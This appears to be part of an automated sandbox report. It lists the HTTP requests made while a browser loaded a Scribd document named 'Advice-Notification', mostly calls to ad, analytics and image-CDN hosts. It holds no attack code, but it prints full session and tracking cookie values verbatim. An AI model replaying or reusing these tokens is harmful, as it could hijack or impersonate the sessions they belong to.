osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _scribd_session=UlVnZzY0RlR0NVF3UmNaZmRmN3ZFUENkeTRERFQ2UzlnOFB4NmxkZFo4RDMzMVdrWjdJWlZZdHhkNVZEbGx0ZG5xRFBWSnpJOGxIYkgwcjl3SHlSZG5SKzhmRG03M2MzUUFBdEVNZ3RNbkpkcGdRMFgzSHQzcU1RUGtQZldweUtZOEt5OW1OWS9TNnlFSlliWkdBUWF4V1dVUytsWFdSaHdjSURhaEQ0d3NVL3RTTUNyK0JhZU1ZSE40R2xQa0h2cUxwaExacDd1eWovR09ZV2dsd3kwZEtzWmFld1Q4eW9qc0tSM3pWNmxHdzk5ZHRWZFVqdGloZEdDRjIxVGx2TXpHU25PbGhKRURKUDg4ank2ckxiT3BDTUdIM0U1MHFwOUV4UHJSSkVzbFdQdStyMGgxQzQyTXpkUU9QSWhrcFQtLVVvYklTUjZmYWJqSThGbzdVUlRTN2c9PQ%3D%3D--a57245b927d8f6e851d3853f71018b5eeaa4013c; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _scribd_session=WDJuL3JwTU91QTA4RTFEb2hjL01LWk1PL1ZYNGkyZ2ZhTEJEZnYxY1kwT25lQ2hySmJzaEFNTDZtRjZyRm82MXIyRHl0VUhaTndrSFhnMU1nK3l6OTVNVTdWcWpDZmtiZ21tWVVhd3kzRWE0YU9xOVdqRFYyMVJoMHVUcUdHcFI3WSttWXdLTXBzQ1QwOEVvN2ZuNTZSSnFneVhVcCtTNXFCbTNMczJ0S2lCNFVMUEFnWlNya1h6d081Rk1MQXlnTGJYUktJUzNGZnhYVjRzZzFWRC9Ga2xiQnA4bGhXOHl3RXhhamJwRW9pRHpYdlBjN3JFYlhWUHNra2x4UUlxUkJSRExFVGpla2IyNUhjWTlxc25nRE05VHR4QnRSTG03SHRRZTV6OGJFQnFieWRGSGVtOWZpUkNuZW93eDBUSXAtLTl4UFJEbUYzQ3phQmFDVTVlaitoZnc9PQ%3D%3D--e7c6233893d2b6690fa7e41495a2b215ab45736d; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.0.1733522367.60.0.0; _ga=GA1.1.30215218.1733522367; _ga_Z4ZC50DED6=GS1.1.1733522367.1.0.1733522367.60.0.0
    Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-8KZ8BV0P5W&gacid=30215218.1733522367&gtm=45je4c40v9101042369z878386455za200zb78386455&dma=0&gcs=G1--&gcd=13l3l3l3l5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485&z=2071923882 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-Z4ZC50DED6&gacid=30215218.1733522367&gtm=45je4c40v9101043253z878386455za200zb78386455&dma=0&gcs=G1--&gcd=13l3l3l3l5l1&npa=0&pscdl=noapi&_ng=1&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485&z=380623333 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4&n3pc=true HTTP/1.1Host: rp.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a
    Source: global trafficHTTP traffic detected: GET /document/801519291/Advice-Notification HTTP/1.1Host: www.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.0.1733522367.60.0.0; _ga=GA1.1.30215218.1733522367; _ga_Z4ZC50DED6=GS1.1.1733522367.1.0.1733522367.60.0.0; _dd_s=rum=0&expire=1733523269039; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c
    Source: global trafficHTTP traffic detected: GET /img/word_document/322011391/149x198/14bbaf98d5/1733344475?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/357813054/149x198/d1d2a4e180/1732363287?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4&n3pc=true HTTP/1.1Host: rp.liadm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a; lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a
    Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/335808746/149x198/ec87a4c99b/1731725376?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/322011391/149x198/14bbaf98d5/1733344475?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /api/v1/events HTTP/1.1Host: wa.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f91-47ab-8dba-9f2882b68d4f%22%2C%22cookies_enabled%22%3Atrue%2C%22hardware_concurrency%22%3A4%2C%22height%22%3A1024%2C%22java_enabled%22%3Afalse%2C%22left%22%3A0%2C%22max_touch_points%22%3A0%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixel_depth%22%3A24%2C%22platform%22%3A%22Win32%22%2C%22referrer%22%3A%22%22%2C%22time_zone%22%3A%22America%2FNew_York%22%2C%22top%22%3A0%2C%22width%22%3A1280%7D; _li_dcdm_c=.scribd.com; _lc2_fpi=4b59e25de34b--01jeezr76nste791ys80m8qnan; _ga_8KZ8BV0P5W=GS1.1.1733522367.1.0.1733522367.60.0.0; _ga=GA1.1.30215218.1733522367; _ga_Z4ZC50DED6=GS1.1.1733522367.1.0.1733522367.60.0.0; _scribd_session=NklvbGhTTVUxUFJDWXpuTks5U0RVWHRrWDNCUGQ1ZWpBZmN6aXJOelRyTURRZi9qY1dhS1lhMVkyOUl1QkVMcnNkdm55cFJ3QXJIVGV3VW5XRWdRdlkvQlJJY2V5T0ttS3RITXF6N2FGWDgzZTdQejVENlEvRW9sVkVsSk5GUE05dEhQRzdoTlBjTTBKWVQ2SlBYSi92NDlNMEZ6c2hVVHpSd0FHdUs0eWF1aTJOQ2ZhckVCRnVEN0pZUnYrNk55dVZkR2cvV3hnY0x6QmhmNmpmMFNwbFlPV1lFUU1ndGdPRERGUWJ5VGdaQS9iNXM1MG1nRm1LWDM4dWhGYUh6NmJaZHdOdFNpb0szb2Mvd2RKcTFwcVZjRUhzaWxJWVBvcXIrcTdEdy9oL1JyRTROZW9yMUVGcUZ6MzNPc2JOeTItLXR3Q2J4VU9ETDdKVUN3MndaYTdYeGc9PQ%3D%3D--013a678e67b88405a39303e630fa2ecf6921e89c
    Source: global trafficHTTP traffic detected: GET /img/word_document/357813054/149x198/d1d2a4e180/1732363287?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ping.min.js HTTP/1.1Host: cdn.pdst.fmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /A3071581-5350-42cd-80be-79cdd173e0991.js HTTP/1.1Host: utt.impactcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/335808746/149x198/ec87a4c99b/1731725376?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
